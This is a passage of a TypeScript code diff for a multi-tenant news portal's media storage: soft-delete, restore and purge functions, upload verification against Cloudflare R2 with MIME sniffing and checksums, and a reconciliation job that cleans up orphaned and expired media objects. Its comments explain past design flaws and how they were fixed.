+  tx: Bun.SQL,
+  tenantId: string,
+  actorTenantUserId: string,
+  id: string,
+  reason: string,
+  correlationId?: string
+): Promise<boolean> {
+  const rows = (await tx`
+    UPDATE awcms_news_media_objects
+    SET deleted_at = now(), deleted_by = ${actorTenantUserId}, delete_reason = ${reason},
+        updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NULL
+    RETURNING object_key
+  `) as { object_key: string }[];
+
+  if (rows.length === 0) return false;
+
+  await recordAuditEvent(tx, {
+    tenantId,
+    actorTenantUserId,
+    moduleKey: AUDIT_MODULE_KEY,
+    action: "news_media.object.deleted",
+    resourceType: AUDIT_RESOURCE_TYPE,
+    resourceId: id,
+    severity: "warning",
+    message: `News media object soft deleted: ${rows[0]!.object_key}.`,
+    attributes: { objectKey: rows[0]!.object_key, reason },
+    correlationId
+  });
+
+  return true;
+}
+
+export async function restoreNewsMediaObject(
+  tx: Bun.SQL,
+  tenantId: string,
+  actorTenantUserId: string,
+  id: string,
+  correlationId?: string
+): Promise<NewsMediaObjectView | null> {
+  const rows = (await tx`
+    UPDATE awcms_news_media_objects
+    SET deleted_at = NULL, deleted_by = NULL, delete_reason = NULL,
+        restored_at = now(), restored_by = ${actorTenantUserId}, updated_at = now()
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NOT NULL
+    RETURNING id, tenant_id, module_key, owner_resource_type, owner_resource_id,
+      storage_driver, bucket_name, object_key, original_filename, public_url,
+      mime_type, size_bytes, checksum_sha256, width, height, alt_text, caption,
+      status, created_by_tenant_user_id, created_at, updated_at,
+      deleted_at, deleted_by, delete_reason, restored_at, restored_by
+  `) as NewsMediaObjectRow[];
+
+  const restored = rows[0] ? toView(rows[0]) : null;
+  if (!restored) return null;
+
+  await recordAuditEvent(tx, {
+    tenantId,
+    actorTenantUserId,
+    moduleKey: AUDIT_MODULE_KEY,
+    action: "news_media.object.restored",
+    resourceType: AUDIT_RESOURCE_TYPE,
+    resourceId: id,
+    severity: "info",
+    message: `News media object restored: ${restored.objectKey}.`,
+    attributes: { objectKey: restored.objectKey },
+    correlationId
+  });
+
+  return restored;
+}
+
+/**
+ * Hard delete. Caller must have already verified the row is soft-deleted
+ * (this only guards it at the SQL level via `deleted_at IS NOT NULL` in the
+ * WHERE clause) — same "caller verifies eligibility first" convention as
+ * `blog-content/application/blog-post-directory.ts`'s `purgeBlogPost`.
+ */
+export async function purgeNewsMediaObject(
+  tx: Bun.SQL,
+  tenantId: string,
+  actorTenantUserId: string,
+  id: string,
+  correlationId?: string
+): Promise<boolean> {
+  const rows = (await tx`
+    DELETE FROM awcms_news_media_objects
+    WHERE tenant_id = ${tenantId} AND id = ${id} AND deleted_at IS NOT NULL
+    RETURNING object_key
+  `) as { object_key: string }[];
+
+  if (rows.length === 0) return false;
+
+  await recordAuditEvent(tx, {
+    tenantId,
+    actorTenantUserId,
+    moduleKey: AUDIT_MODULE_KEY,
+    action: "news_media.object.purged",
+    resourceType: AUDIT_RESOURCE_TYPE,
+    resourceId: id,
+    severity: "warning",
+    message: `News media object purged: ${rows[0]!.object_key}.`,
+    attributes: { objectKey: rows[0]!.object_key },
+    correlationId
+  });
+
+  return true;
+}

--- a/src/modules/news-portal/application/news-media-port-adapter.ts
+++ b/src/modules/news-portal/application/news-media-port-adapter.ts
@@ -1,0 +1,133 @@
+/**
+ * Concrete `NewsMediaPort` implementation (Issue #681, epic #679
+ * platform-hardening) — `news_portal`'s own capability, wired into
+ * `blog_content`'s write/render paths at the composition root (route
+ * handlers), never imported by `blog_content`'s `application`/`domain`
+ * files directly. See `_shared/ports/news-media-port.ts` for the full
+ * "why a port" reasoning.
+ *
+ * `isFullOnlineR2ModeActiveForTenant` below is the exact function
+ * previously named `isNewsPortalFullOnlineR2ModeActiveForTenant` in
+ * `blog-content/application/news-portal-r2-mode-gate.ts` (Issue #636) —
+ * moved here verbatim, together with its header comment, because it is
+ * fundamentally `news_portal`'s OWN "is my feature active for this
+ * tenant" question, not something `blog_content` should have needed to
+ * import in the first place.
+ *
+ * ## THREE failed attempts before the working signal below — read before touching this again (PR #666, three review rounds; history preserved from the original file)
+ *
+ * 1. `fetchTenantModuleEntry(...).tenantEnabled` — every module in this
+ *    repo is opt-out-by-default (no `awcms_tenant_modules` row means
+ *    enabled), so virtually every tenant reads as `news_portal`-enabled
+ *    regardless of whether they ever applied the preset. Made the entire
+ *    tenant-scoping a no-op — activating the preset for one tenant
+ *    silently tightened validation for every OTHER tenant on the same
+ *    deployment too.
+ * 2. `entry.enabledAt !== null` — reasoning was "only an explicit
+ *    `enableTenantModule` call sets this column." Also broken:
+ *    `enableTenantModule` validates the tenant's CURRENT state first, and
+ *    since that state already reads as enabled-by-default (same fact as
+ *    #1), the lifecycle validation rejects the call as
+ *    `MODULE_ALREADY_ENABLED`, which `applyModulePreset` treats as
+ *    `already_satisfied` and — critically — never writes a row at all. A
+ *    tenant that genuinely just applied the preset had `enabledAt: null`,
+ *    identical to one that never touched it. Confirmed broken by a
+ *    failing integration test, not just theory.
+ * 3. `awcms_module_settings` (`updateModuleSettings`/
+ *    `fetchModuleSettingsView`) — this one DID correctly distinguish
+ *    "applied" from "never touched." But that table is directly
+ *    tenant-writable through the generic
+ *    `PATCH /api/v1/tenant/modules/{moduleKey}/settings` endpoint, gated
+ *    only by the generic `module_management.settings.update` permission
+ *    (granted to Owner/Admin by default seed RBAC — entirely unrelated to
+ *    `blog_content`/`news_portal` permissions). A tenant holding that
+ *    permission could `PATCH` the marker key to `null` and silently
+ *    disable ALL of Issue #636's validation for themselves — confirmed
+ *    exploitable end-to-end in a security re-audit.
+ *
+ * The real, working signal: a brand-new, dedicated table
+ * (`awcms_news_portal_tenant_state`, migration `043`) that has NO
+ * generic write endpoint anywhere. The only code that ever writes to it is
+ * `apply-news-portal-preset.ts` (`applyNewsPortalFullOnlineR2Preset`, the
+ * sanctioned entry point for this preset).
+ */
+import { isFullOnlineR2ModeAppliedForTenant } from "./news-portal-tenant-state";
+import { evaluateNewsPortalFullOnlineR2Readiness } from "../domain/news-portal-preset-readiness";
+import { resolveNewsMediaR2Config } from "../domain/news-media-r2-config";
+import {
+  fetchNewsMediaObjectById,
+  fetchNewsMediaObjectsByIds,
+  isNewsMediaObjectSafeForPublicReference
+} from "./news-media-object-directory";
+import type {
+  NewsMediaPort,
+  ResolvedNewsMediaReferenceDTO
+} from "../../_shared/ports/news-media-port";
+
+export const newsMediaPortAdapter: NewsMediaPort = {
+  async isFullOnlineR2ModeActiveForTenant(
+    tx: Bun.SQL,
+    tenantId: string,
+    env: NodeJS.ProcessEnv = process.env
+  ): Promise<boolean> {
+    if (!evaluateNewsPortalFullOnlineR2Readiness(env).ready) {
+      return false;
+    }
+
+    return isFullOnlineR2ModeAppliedForTenant(tx, tenantId);
+  },
+
+  async isMediaReferenceSafe(
+    tx: Bun.SQL,
+    tenantId: string,
+    mediaObjectId: string
+  ): Promise<boolean> {
+    const media = await fetchNewsMediaObjectById(tx, tenantId, mediaObjectId);
+    return (
+      media !== null && isNewsMediaObjectSafeForPublicReference(media.status)
+    );
+  },
+
+  async resolveMediaReferences(
+    tx: Bun.SQL,
+    tenantId: string,
+    mediaObjectIds: readonly string[]
+  ): Promise<ReadonlyMap<string, ResolvedNewsMediaReferenceDTO>> {
+    const resolved = new Map<string, ResolvedNewsMediaReferenceDTO>();
+
+    // Issue #835 §1: one `id = ANY(...)` round-trip for the whole batch,
+    // instead of one `fetchNewsMediaObjectById` per id. Unsafe / nonexistent
+    // / cross-tenant ids are simply absent from the result (the row is filtered
+    // by status or never returned), never thrown — same contract as before.
+    const mediaObjects = await fetchNewsMediaObjectsByIds(
+      tx,
+      tenantId,
+      mediaObjectIds
+    );
+
+    for (const media of mediaObjects) {
+      if (isNewsMediaObjectSafeForPublicReference(media.status)) {
+        resolved.set(media.id, {
+          publicUrl: media.publicUrl,
+          altText: media.altText,
+          mimeType: media.mimeType,
+          width: media.width,
+          height: media.height,
+          sizeBytes: media.sizeBytes
+        });
+      }
+    }
+
+    return resolved;
+  },
+
+  resolveMediaPublicBaseUrl(env: NodeJS.ProcessEnv = process.env): string {
+    // Issue #859 (epic #818): the config-resolution capability the LinkedIn
+    // provider adapter (social_publishing) consumes through this port instead
+    // of importing `resolveNewsMediaR2Config` statically — which had forced
+    // `news_portal` to be a HARD dependency of `social_publishing`. The
+    // config knowledge (the `NEWS_MEDIA_R2_*` var naming/defaults, its
+    // deliberate deviations) stays here, in `news_portal`, where it belongs.
+    return resolveNewsMediaR2Config(env).publicBaseUrl;
+  }
+};

--- a/src/modules/news-portal/application/news-media-r2-verification.ts
+++ b/src/modules/news-portal/application/news-media-r2-verification.ts
@@ -1,0 +1,120 @@
+/**
+ * Orchestrates the finalize step's real R2 verification (Issue #634, epic
+ * `news_portal`) — the fix for the security-auditor Critical finding on
+ * Issue #631: `HEAD` alone is NEVER sufficient to promote a media object to
+ * `verified`. This function performs, in this exact order
+ * (`full-online-r2-architecture.md` §9, `r2-upload-sop.md` §2 step 5):
+ *
+ *   1. `HEAD` (via `NewsMediaR2Client.headObject`) — cheap existence +
+ *      size fast-path, short-circuits before any full `GET` for a missing
+ *      or (as R2 reports it right now) over-size object.
+ *   2. Full `GET` (via `NewsMediaR2Client.getObject`), streamed and capped
+ *      at `maxUploadBytes` — reads the object's actual bytes. This is the
+ *      REAL size enforcement (PR #653 review, security-auditor Critical):
+ *      `headObject`'s report can be stale by the time this runs (a
+ *      presigned PUT URL is reusable, so the object at this key can be
+ *      swapped for a much larger one between step 1 and step 2), so a
+ *      `sizeExceeded` result here is treated as authoritative regardless of
+ *      what `HEAD` reported a moment earlier.
+ *   3. MIME sniffing from magic bytes (`sniffNewsMediaMimeType`) against
+ *      the bytes from step 2 — NOT `Content-Type`, NOT the file extension,
+ *      NOT the checksum.
+ *   4. Server-side SHA-256 checksum, AND the authoritative `sizeBytes`,
+ *      both computed from the SAME bytes actually read in step 2 — never
+ *      from `head.sizeBytes`.
+ *   5. `decideNewsMediaFinalizeOutcome` — the pure classification of the
+ *      above against the allow-list/claimed mime type/claimed checksum.
+ *
+ * Deliberately takes no `Bun.SQL`/transaction — every call here is a
+ * network call to R2 and must run strictly OUTSIDE any DB transaction
+ * (ADR-0006). The caller (`application/news-media-finalize-upload-session.ts`)
+ * runs this between two separate `withTenant` blocks, and only after having
+ * already atomically claimed the row (`pending_upload -> uploaded`) in the
+ * first of those — see that module's header for why (security-auditor
+ * High finding, PR #653 review: without that claim, concurrent `finalize`
+ * calls using different `Idempotency-Key`s would each reach this function
+ * and each pay for their own `HEAD`+`GET` against the same object).
+ */
+import type { NewsMediaR2Client } from "../infrastructure/news-media-r2-client";
+import { sniffNewsMediaMimeType } from "../domain/news-media-mime-sniffer";
+import { decideNewsMediaFinalizeOutcome } from "../domain/news-media-finalize-decision";
+
+export type VerifyNewsMediaR2ObjectInput = {
+  objectKey: string;
+  claimedMimeType: string;
+  allowedMimeTypes: string[];
+  maxUploadBytes: number;
+  claimedChecksumSha256: string | null;
+};
+
+export type NewsMediaR2VerificationRejectionReason =
+  | "object_not_found"
+  | "size_exceeded"
+  | "mime_not_recognized"
+  | "mime_not_allowed"
+  | "mime_mismatch"
+  | "checksum_mismatch";
+
+export type NewsMediaR2VerificationResult =
+  | { outcome: "accepted"; sizeBytes: number; checksumSha256: string }
+  | { outcome: "rejected"; reason: NewsMediaR2VerificationRejectionReason }
+  | { outcome: "provider_error"; error: string };
+
+export async function verifyNewsMediaR2Object(
+  client: NewsMediaR2Client,
+  input: VerifyNewsMediaR2ObjectInput
+): Promise<NewsMediaR2VerificationResult> {
+  const head = await client.headObject(input.objectKey);
+
+  if (!head.ok) {
+    return { outcome: "provider_error", error: head.error };
+  }
+
+  if (!head.exists) {
+    return { outcome: "rejected", reason: "object_not_found" };
+  }
+
+  if (head.sizeBytes > input.maxUploadBytes) {
+    // Fast-path only — still re-checked authoritatively below regardless.
+    return { outcome: "rejected", reason: "size_exceeded" };
+  }
+
+  const get = await client.getObject(input.objectKey, input.maxUploadBytes);
+
+  if (!get.ok) {
+    return { outcome: "provider_error", error: get.error };
+  }
+
+  if (get.sizeExceeded) {
+    // The authoritative check: the object actually read exceeds the cap,
+    // regardless of what `HEAD` reported a moment earlier (TOCTOU — the
+    // presigned PUT URL can be reused to swap the object between HEAD and
+    // GET). No bytes were fully buffered for this outcome.
+    return { outcome: "rejected", reason: "size_exceeded" };
+  }
+
+  const sniffedMimeType = sniffNewsMediaMimeType(get.bytes);
+  const hasher = new Bun.CryptoHasher("sha256");
+  hasher.update(get.bytes);
+  const computedChecksumSha256 = hasher.digest("hex");
+
+  const decision = decideNewsMediaFinalizeOutcome({
+    claimedMimeType: input.claimedMimeType,
+    allowedMimeTypes: input.allowedMimeTypes,
+    sniffedMimeType,
+    claimedChecksumSha256: input.claimedChecksumSha256,
+    computedChecksumSha256
+  });
+
+  if (!decision.accepted) {
+    return { outcome: "rejected", reason: decision.reason };
+  }
+
+  return {
+    outcome: "accepted",
+    // Authoritative — the length of the bytes actually read in step 2,
+    // never `head.sizeBytes`.
+    sizeBytes: get.bytes.byteLength,
+    checksumSha256: computedChecksumSha256
+  };
+}

--- a/src/modules/news-portal/application/news-media-reconciliation.ts
+++ b/src/modules/news-portal/application/news-media-reconciliation.ts
@@ -1,0 +1,638 @@
+/**
+ * Per-tenant orchestration for the R2 media lifecycle cleanup &
+ * reconciliation job (Issue #690, epic #679 platform-hardening —
+ * "runtime/worker hardening" wave, following #691/#689/#694/#695/#687/#697).
+ * `scripts/news-media-r2-reconcile.ts` is the thin CLI wrapper (`runJob`
+ * integration, tenant loop, telemetry); this file holds the actual logic so
+ * `tests/integration/news-media-r2-reconciliation-job.integration.test.ts`
+ * can exercise it directly against a real Postgres + fake R2 HTTP server,
+ * same convention `runAuditLogPurge` (`scripts/audit-log-purge.ts`)
+ * established.
+ *
+ * ## Ordering discipline — two DIFFERENT orderings, each independently justified
+ *
+ * (Corrected — reviewer finding on PR #718: this header previously claimed
+ * a single "DB claim first" ordering applied to "both cleanup paths." It
+ * does not; the two paths are ordered oppositely, for two different
+ * reasons, neither of which is an oversight.)
+ *
+ * **`expiredPending` (`cleanupExpiredPending`): DB claim FIRST, R2 delete
+ * SECOND.** `r2-backup-lifecycle.md` §2 asks for "hapus objek R2 dulu, baru
+ * hapus baris metadata" for CRASH safety, but this path claims the DB row
+ * first instead — deliberately:
+ *
+ * - The DB claim uses the SAME "guarded UPDATE...WHERE, Postgres serializes
+ *   concurrent writers" idiom `finalizeNewsMediaUploadSession` already uses
+ *   for its own atomic claim — doing the R2 call FIRST would mean a
+ *   concurrently in-flight `finalize()` call could win the race AFTER this
+ *   job already deleted the object out from under it. Claiming in the DB
+ *   first is what makes "never delete a row that is genuinely still being
+ *   finalized" possible at all (this repo's critical acceptance criterion
+ *   for this job) — `pending_upload`/`uploaded` rows CAN be raced against a
+ *   real, concurrently-running upload/finalize flow.
+ * - The failure mode the doc's ordering avoids (a stray R2 object with no
+ *   matching DB row) is NOT a dead end here — it is EXACTLY the
+ *   `orphanInR2` category `news-media-reconciliation-categorization.ts`
+ *   independently detects and eventually cleans up on a LATER run. A crash
+ *   between this module's DB claim and its R2 delete therefore self-heals,
+ *   just on the next scheduled run instead of instantly.
+ *
+ * **`staleOrphaned` (`cleanupStaleOrphaned`): R2 delete FIRST, DB soft-
+ * delete SECOND** — the doc's original ordering, unmodified. This path has
+ * no equivalent race to guard against: no other code path in
+ * `news-media-object-directory.ts` ever transitions a row OUT of
+ * `status = 'orphaned'` (there is no "un-orphan" operation), so there is no
+ * concurrently-running flow that could be racing this cleanup the way
+ * `finalize()` races `expiredPending`. R2-delete-first here matches the
+ * doc's own crash-safety reasoning: a crash after the R2 delete but before
+ * the DB soft-delete just leaves a row pointing at an already-gone object,
+ * which the NEXT run's `orphanInDb`/retry naturally reconciles.
+ *
+ * ## Idempotency across reruns
+ *
+ * Every mutation below is a guarded UPDATE/DELETE that only succeeds if the
+ * row is STILL in the exact state that made it eligible. Once a row is
+ * hard-deleted (`expiredPending`) or soft-deleted (`staleOrphaned`), it no
+ * longer appears in the NEXT run's `fetchNewsMediaObjectsForReconciliation`
+ * snapshot (hard-delete) or no longer satisfies the `deleted_at IS NULL`
+ * guard (soft-delete) — so a rerun with nothing new to do performs zero
+ * mutations and reports the same `healthy` set, by construction, not by a
+ * separate "already processed" bookkeeping mechanism.
+ *
+ * ## Provider outage handling
+ *
+ * `r2Client.listObjects`/`deleteObject` never throw (same convention as
+ * every other method on `NewsMediaR2Client` — see that file's header) — a
+ * provider error is a normal `{ ok: false, error }` return. A `listObjects`
+ * failure aborts THIS TENANT's reconciliation only (returns
+ * `r2ListFailed: true`, no DB mutation attempted, `orphanInR2` cannot be
+ * computed without a listing) and the caller continues to the next tenant —
+ * one tenant's R2 outage never blocks another tenant's, and never blocks
+ * unrelated DB-only work elsewhere in the process. A `deleteObject` failure
+ * for one candidate is deferred (counted, logged, left for the next run) —
+ * it never aborts the rest of that tenant's cleanup loop.
+ */
+import { withTenant } from "../../../lib/database/tenant-context";
+import { fetchActiveTenants } from "../../../lib/jobs/batching";
+import {
+  categorizeNewsMediaReconciliation,
+  isOrphanInR2EligibleForDeletion,
+  type NewsMediaExpiredPendingEntry,
+  type NewsMediaOrphanInDbEntry,
+  type NewsMediaOrphanInR2Entry,
+  type NewsMediaReconciliationDbRow,
+  type NewsMediaStaleOrphanedEntry
+} from "../domain/news-media-reconciliation-categorization";
+import type { NewsMediaR2Config } from "../domain/news-media-r2-config";
+import type { NewsMediaR2Client } from "../infrastructure/news-media-r2-client";
+import {
+  fetchNewsMediaObjectsForReconciliation,
+  markNewsMediaObjectFailed,
+  markStaleOrphanedNewsMediaObjectDeleted,
+  NEWS_MEDIA_RECONCILIATION_SNAPSHOT_LIMIT,
+  objectKeyExistsForTenant,
+  purgeExpiredPendingNewsMediaObject
+} from "./news-media-object-directory";
+
+/** Safety bound on R2 `list()` pages fetched per tenant per run — mirrors `src/lib/jobs/batching.ts`'s `DEFAULT_MAX_PASSES` reasoning (a single run must never page through an unbounded bucket forever). At the R2 API's own default page size (1000 keys), 50 pages is up to 50,000 objects per tenant per run; a bucket with more is only PARTIALLY reconciled this run (`r2ListTruncated: true`), fully caught up over subsequent runs. */
+export const MAX_R2_LIST_PAGES = 50;
+
+const R2_LIST_PAGE_MAX_KEYS = 1000;
+
+export type NewsMediaReconciliationOptions = {
+  now?: Date;
+  dryRun?: boolean;
+  signal?: AbortSignal;
+  /** Test-only override for `R2_LIST_PAGE_MAX_KEYS` (defaults to the real R2 page size, 1000) — lets integration tests exercise multi-page pagination deterministically with a handful of fake objects instead of needing thousands. Not a new CLI flag; production always uses the real default. */
+  pageSize?: number;
+};
+
+export type NewsMediaTenantReconciliationResult = {
+  tenantId: string;
+  dryRun: boolean;
+  /** `true` if `fetchNewsMediaObjectsForReconciliation` returned exactly its `limit` — this tenant's DB snapshot may be incomplete this run. */
+  dbSnapshotTruncated: boolean;
+  /** `true` if R2 `listObjects` hit `MAX_R2_LIST_PAGES` before `isTruncated` was `false` — this tenant's R2 listing may be incomplete this run. */
+  r2ListTruncated: boolean;
+  /** `true` if `listObjects` returned a provider error at any page — no categorization/cleanup was attempted for this tenant this run. */
+  r2ListFailed: boolean;
+  r2ListError?: string;
+  healthyCount: number;
+  orphanInDb: NewsMediaOrphanInDbEntry[];
+  expiredPending: {
+    total: number;
+    deleted: number;
+    racedSkipped: number;
+    deferred: number;
+  };
+  staleOrphaned: {
+    total: number;
+    deleted: number;
+    deferred: number;
+  };
+  orphanInR2: {
+    total: number;
+    eligible: number;
+    deleted: number;
+    raceAverted: number;
+    deferred: number;
+    /** Eligible-but-not-yet-acted-on entries (dry-run, or not reached due to `signal` abort) — capped for telemetry size. */
+    reported: NewsMediaOrphanInR2Entry[];
+  };
+};
+
+function tenantObjectKeyPrefix(tenantId: string): string {
+  return `news-media/${tenantId}/`;
+}
+
+/** Paginates `r2Client.listObjects` for one tenant's key prefix until `isTruncated` is `false`, `MAX_R2_LIST_PAGES` is hit, `signal` aborts, or a page returns a provider error. */
+async function listAllNewsMediaObjectsForTenant(
+  r2Client: NewsMediaR2Client,
+  tenantId: string,
+  signal?: AbortSignal,
+  pageSize: number = R2_LIST_PAGE_MAX_KEYS
+): Promise<
+  | {
+      ok: true;
+      objects: { key: string; sizeBytes?: number; lastModified?: string }[];
+      truncated: boolean;
+    }
+  | { ok: false; error: string }
+> {
+  const prefix = tenantObjectKeyPrefix(tenantId);
+  const objects: { key: string; sizeBytes?: number; lastModified?: string }[] =
+    [];
+  let continuationToken: string | undefined;
+  let truncated = false;
+
+  for (let page = 0; page < MAX_R2_LIST_PAGES; page += 1) {
+    if (signal?.aborted) {
+      truncated = true;
+      break;
+    }
+
+    const result = await r2Client.listObjects({
+      prefix,
+      continuationToken,
+      maxKeys: pageSize
+    });
+
+    if (!result.ok) {
+      return { ok: false, error: result.error };
+    }
+
+    objects.push(...result.objects);
+
+    if (!result.isTruncated) {
+      truncated = false;
+      break;
+    }
+
+    continuationToken = result.nextContinuationToken;
+    if (!continuationToken) {
+      // R2 reported more pages but gave no token to continue with —
+      // treat as truncated rather than looping forever on an empty token.
+      truncated = true;
+      break;
+    }
+
+    if (page === MAX_R2_LIST_PAGES - 1) {
+      truncated = true;
+    }
+  }
+
+  return { ok: true, objects, truncated };
+}
+
+function toReconciliationDbRow(row: {
+  id: string;
+  objectKey: string;
+  status: NewsMediaReconciliationDbRow["status"];
+  createdAt: Date;
+  orphanedAt: Date | null;
+  deletedAt: Date | null;
+}): NewsMediaReconciliationDbRow {
+  return row;
+}
+
+async function cleanupExpiredPending(
+  sql: Bun.SQL,
+  tenantId: string,
+  entries: NewsMediaExpiredPendingEntry[],
+  pendingCutoff: Date,
+  r2Client: NewsMediaR2Client,
+  signal?: AbortSignal
+): Promise<{ deleted: number; racedSkipped: number; deferred: number }> {
+  let deleted = 0;
+  let racedSkipped = 0;
+  let deferred = 0;
+
+  for (const entry of entries) {
+    if (signal?.aborted) break;
+
+    if (entry.status !== "failed") {
+      // Atomic claim — see this file's header. If a concurrent finalize()
+      // already moved this row out of pending_upload/uploaded, the guarded
+      // UPDATE matches zero rows and we skip it entirely: never touch R2
+      // for a row that is genuinely still in flight.
+      const claimed = await withTenant(
+        sql,
+        tenantId,
+        (tx) =>
+          markNewsMediaObjectFailed(tx, tenantId, entry.id, {
+            olderThan: pendingCutoff
+          }),
+        { workClass: "maintenance" }
+      );
+
+      if (!claimed) {
+        racedSkipped += 1;
+        continue;
+      }
+    }
+
+    const deleteResult = await r2Client.deleteObject(entry.objectKey);
+
+    if (!deleteResult.ok) {
+      deferred += 1;
+      continue;
+    }
+
+    const purged = await withTenant(
+      sql,
+      tenantId,
+      (tx) =>
+        purgeExpiredPendingNewsMediaObject(
+          tx,
+          tenantId,
+          entry.id,
+          pendingCutoff
+        ),
+      { workClass: "maintenance" }
+    );
+
+    if (purged) {
+      deleted += 1;
+    } else {
+      // Already gone (a concurrent run/process purged it first) — not an
+      // error, just nothing left for this run to do for this row.
+      deferred += 0;
+    }
+  }
+
+  return { deleted, racedSkipped, deferred };
+}
+
+async function cleanupStaleOrphaned(
+  sql: Bun.SQL,
+  tenantId: string,
+  entries: NewsMediaStaleOrphanedEntry[],
+  orphanCutoff: Date,
+  r2Client: NewsMediaR2Client,
+  signal?: AbortSignal
+): Promise<{ deleted: number; deferred: number }> {
+  let deleted = 0;
+  let deferred = 0;
+
+  for (const entry of entries) {
+    if (signal?.aborted) break;
+
+    const deleteResult = await r2Client.deleteObject(entry.objectKey);
+
+    if (!deleteResult.ok) {
+      deferred += 1;
+      continue;
+    }
+
+    const softDeleted = await withTenant(
+      sql,
+      tenantId,
+      (tx) =>
+        markStaleOrphanedNewsMediaObjectDeleted(
+          tx,
+          tenantId,
+          entry.id,
+          orphanCutoff
+        ),
+      { workClass: "maintenance" }
+    );
+
+    if (softDeleted) {
+      deleted += 1;
+    }
+  }
+
+  return { deleted, deferred };
+}
+
+async function cleanupOrphanInR2(
+  sql: Bun.SQL,
+  tenantId: string,
+  entries: NewsMediaOrphanInR2Entry[],
+  orphanGraceDays: number,
+  r2Client: NewsMediaR2Client,
+  signal?: AbortSignal
+): Promise<{ deleted: number; raceAverted: number; deferred: number }> {
+  let deleted = 0;
+  let raceAverted = 0;
+  let deferred = 0;
+
+  for (const entry of entries) {
+    if (signal?.aborted) break;
+    if (!isOrphanInR2EligibleForDeletion(entry, orphanGraceDays)) continue;
+
+    // Race re-check — see news-media-object-directory.ts's
+    // `objectKeyExistsForTenant` header for exactly why this MUST be a
+    // fresh, targeted point lookup immediately before deleting, not a reuse
+    // of the earlier bulk snapshot.
+    const stillOrphan = !(await withTenant(
+      sql,
+      tenantId,
+      (tx) => objectKeyExistsForTenant(tx, tenantId, entry.objectKey),
+      { workClass: "maintenance" }
+    ));
+
+    if (!stillOrphan) {
+      raceAverted += 1;
+      continue;
+    }
+
+    const deleteResult = await r2Client.deleteObject(entry.objectKey);
+
+    if (deleteResult.ok) {
+      deleted += 1;
+    } else {
+      deferred += 1;
+    }
+  }
+
+  return { deleted, raceAverted, deferred };
+}
+
+const REPORTED_ORPHAN_IN_R2_LIMIT = 100;
+
+/**
+ * Reconciles ONE tenant's news media DB metadata against its R2 bucket
+ * contents. Read-only (categorization + reporting) when `options.dryRun` is
+ * `true`; otherwise performs the bounded cleanup described in this file's
+ * header. Never throws for a provider-side failure (see header) — a
+ * database-side failure (a real bug, connection loss mid-transaction, etc.)
+ * DOES propagate, same as every other `withTenant`-based job in this repo.
+ */
+export async function reconcileNewsMediaForTenant(
+  sql: Bun.SQL,
+  tenantId: string,
+  config: NewsMediaR2Config,
+  r2Client: NewsMediaR2Client,
+  options: NewsMediaReconciliationOptions = {}
+): Promise<NewsMediaTenantReconciliationResult> {
+  const now = options.now ?? new Date();
+  const dryRun = options.dryRun ?? false;
+  const signal = options.signal;
+
+  const snapshotRows = await withTenant(
+    sql,
+    tenantId,
+    (tx) => fetchNewsMediaObjectsForReconciliation(tx, tenantId),
+    { workClass: "maintenance" }
+  );
+  const dbSnapshotTruncated =
+    snapshotRows.length >= NEWS_MEDIA_RECONCILIATION_SNAPSHOT_LIMIT;
+
+  const listResult = await listAllNewsMediaObjectsForTenant(
+    r2Client,
+    tenantId,
+    signal,
+    options.pageSize
+  );
+
+  if (!listResult.ok) {
+    return {
+      tenantId,
+      dryRun,
+      dbSnapshotTruncated,
+      r2ListTruncated: false,
+      r2ListFailed: true,
+      r2ListError: listResult.error,
+      healthyCount: 0,
+      orphanInDb: [],
+      expiredPending: { total: 0, deleted: 0, racedSkipped: 0, deferred: 0 },
+      staleOrphaned: { total: 0, deleted: 0, deferred: 0 },
+      orphanInR2: {
+        total: 0,
+        eligible: 0,
+        deleted: 0,
+        raceAverted: 0,
+        deferred: 0,
+        reported: []
+      }
+    };
+  }
+
+  const categorized = categorizeNewsMediaReconciliation({
+    dbRows: snapshotRows.map(toReconciliationDbRow),
+    r2Objects: listResult.objects,
+    now,
+    pendingTtlMinutes: config.pendingTtlMinutes,
+    orphanGraceDays: config.orphanGraceDays
+  });
+
+  const pendingCutoff = new Date(
+    now.getTime() - config.pendingTtlMinutes * 60_000
+  );
+  const orphanCutoff = new Date(
+    now.getTime() - config.orphanGraceDays * 24 * 60 * 60 * 1000
+  );
+
+  if (dryRun) {
+    return {
+      tenantId,
+      dryRun,
+      dbSnapshotTruncated,
+      r2ListTruncated: listResult.truncated,
+      r2ListFailed: false,
+      healthyCount: categorized.healthy.length,
+      orphanInDb: categorized.orphanInDb,
+      expiredPending: {
+        total: categorized.expiredPending.length,
+        deleted: 0,
+        racedSkipped: 0,
+        deferred: 0
+      },
+      staleOrphaned: {
+        total: categorized.staleOrphaned.length,
+        deleted: 0,
+        deferred: 0
+      },
+      orphanInR2: {
+        total: categorized.orphanInR2.length,
+        eligible: categorized.orphanInR2.filter((entry) =>
+          isOrphanInR2EligibleForDeletion(entry, config.orphanGraceDays)
+        ).length,
+        deleted: 0,
+        raceAverted: 0,
+        deferred: 0,
+        reported: categorized.orphanInR2.slice(0, REPORTED_ORPHAN_IN_R2_LIMIT)
+      }
+    };
+  }
+
+  const expiredPendingResult = await cleanupExpiredPending(
+    sql,
+    tenantId,
+    categorized.expiredPending,
+    pendingCutoff,
+    r2Client,
+    signal
+  );
+
+  const staleOrphanedResult = await cleanupStaleOrphaned(
+    sql,
+    tenantId,
+    categorized.staleOrphaned,
+    orphanCutoff,
+    r2Client,
+    signal
+  );
+
+  const orphanInR2Result = await cleanupOrphanInR2(
+    sql,
+    tenantId,
+    categorized.orphanInR2,
+    config.orphanGraceDays,
+    r2Client,
+    signal
+  );
+
+  return {
+    tenantId,
+    dryRun,
+    dbSnapshotTruncated,
+    r2ListTruncated: listResult.truncated,
+    r2ListFailed: false,
+    healthyCount: categorized.healthy.length,
+    orphanInDb: categorized.orphanInDb,
+    expiredPending: {
+      total: categorized.expiredPending.length,
+      ...expiredPendingResult
+    },
+    staleOrphaned: {
+      total: categorized.staleOrphaned.length,
+      ...staleOrphanedResult
+    },
+    orphanInR2: {
+      total: categorized.orphanInR2.length,
+      eligible: categorized.orphanInR2.filter((entry) =>
+        isOrphanInR2EligibleForDeletion(entry, config.orphanGraceDays)
+      ).length,
+      ...orphanInR2Result,
+      reported: categorized.orphanInR2.slice(0, REPORTED_ORPHAN_IN_R2_LIMIT)
+    }
+  };
+}
+
+export type NewsMediaReconciliationTotals = {
+  tenantsChecked: number;
+  tenantsWithR2ListFailure: number;
+  tenantsWithTruncatedSnapshot: number;
+  healthy: number;
+  orphanInDb: number;
